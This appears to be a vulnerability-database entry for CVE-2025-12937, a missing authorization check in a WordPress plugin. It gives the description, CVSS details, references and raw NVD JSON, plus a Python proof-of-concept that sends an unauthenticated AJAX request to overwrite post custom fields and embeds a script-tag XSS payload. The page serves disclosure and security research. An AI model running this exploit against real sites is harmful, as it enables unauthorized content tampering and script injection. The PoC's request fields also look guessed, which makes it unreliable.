CVE-2025-12937

Description

The ACF Flexible Layouts Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'acf_flm_update_template_with_pasted_layout' function in all versions up to, and including, 1.1.6. This makes it possible for unauthenticated attackers to update custom field values on individual posts and pages.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

ACF Flexible Layouts Manager <= 1.1.6 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# CVE-2025-12937 PoC - Unauthenticated Data Modification
# Target: WordPress with ACF Flexible Layouts Manager <= 1.1.6

target_url = "http://target-wordpress-site.com"
ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

# Target post/page ID to modify
target_post_id = 1

# Malicious custom field data to inject
malicious_data = {
    "acf_flexible_layout": [
        {
            "layout_key": "text_block",
            "content": "<script>alert('XSS')</script>"
        }
    ]
}

# Construct the exploit request
exploit_payload = {
    "action": "acf_flm_update_template_with_pasted_layout",
    "post_id": target_post_id,
    "layout_data": json.dumps(malicious_data),
    "security_token": ""  # No security token required due to missing capability check
}

print("[*] Sending exploit request...")
print(f"[*] Target: {ajax_endpoint}")
print(f"[*] Post ID: {target_post_id}")

response = requests.post(ajax_endpoint, data=exploit_payload, timeout=10)

print(f"[*] Response Status: {response.status_code}")
print(f"[*] Response Body: {response.text}")

if response.status_code == 200:
    print("[+] Exploit sent successfully - Custom field may be modified")
else:
    print("[-] Exploit failed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12937
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12937
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12937/
[4] VulDB https://vuldb.com/cve/CVE-2025-12937
[5] https://plugins.trac.wordpress.org/browser/acf-flexible-layouts-manager/trunk/includes/ajax/ajax-paste.php#L4
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/915cce97-8305-4249-b2d3-c4da2f59a95a?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12937", "sourceIdentifier": "[email protected]", "published": "2025-11-18T09:15:49.470", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ACF Flexible Layouts Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'acf_flm_update_template_with_pasted_layout' function in all versions up to, and including, 1.1.6. This makes it possible for unauthenticated attackers to update custom field values on individual posts and pages."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/acf-flexible-layouts-manager/trunk/includes/ajax/ajax-paste.php#L4", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/915cce97-8305-4249-b2d3-c4da2f59a95a?source=cve", "source": "[email protected]"}]}}